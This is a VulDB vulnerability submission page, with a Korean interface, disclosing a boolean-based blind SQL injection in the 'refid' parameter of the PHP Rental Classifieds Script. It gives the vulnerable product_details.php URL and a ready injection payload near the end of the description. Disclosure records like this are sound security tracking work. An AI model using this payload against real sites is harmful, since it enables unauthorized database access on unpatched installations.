| 제목 | PHP Rental Classifieds Script – 'refid' Parameter Blind SQL Injection |
|---|
| 설명 | Introduction
Exploit Title: PHP Rental Classifieds Script – 'refid' Parameter Blind SQL Injection
Date: 03.02.2017
Vendor Homepage: http://phprealestatescript.org/
Software Link: http://phprealestatescript.org/php-classifieds-rental-script.html
Exploit Author: Kaan KAMIS
Contact: iletisim[at]k2an[dot]com
Website: http://k2an.com
Category: Web Application Exploits
Overview
The PHP Rental Classifieds Script is one among the limited software's, which are designed so user-friendly that anyone with minimal knowledge of operating a computer can utilize it to its optimum. Besides being an easy-to- use software, this Property Rental Script is also very simple to maintain.
Vulnerable Url: http://locahost/rentalscript/product_details.php?refid=1447243483[payload]
Parameter: refid (GET)
Type: boolean-based blind
Payload: refid=1319258872' AND 8147=8147 AND 'XzKk'='XzKk |
|---|
| 사용자 | KAAN KAMIS (UID 213) |
|---|
| 제출 | 2017. 02. 03. AM 08:08 (9 연령 ago) |
|---|
| 모더레이션 | 2017. 02. 03. PM 11:31 (15 hours later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 96543 [PHP Rental Classifieds Script refid SQL 주입] |
|---|
| 포인트들 | 17 |
|---|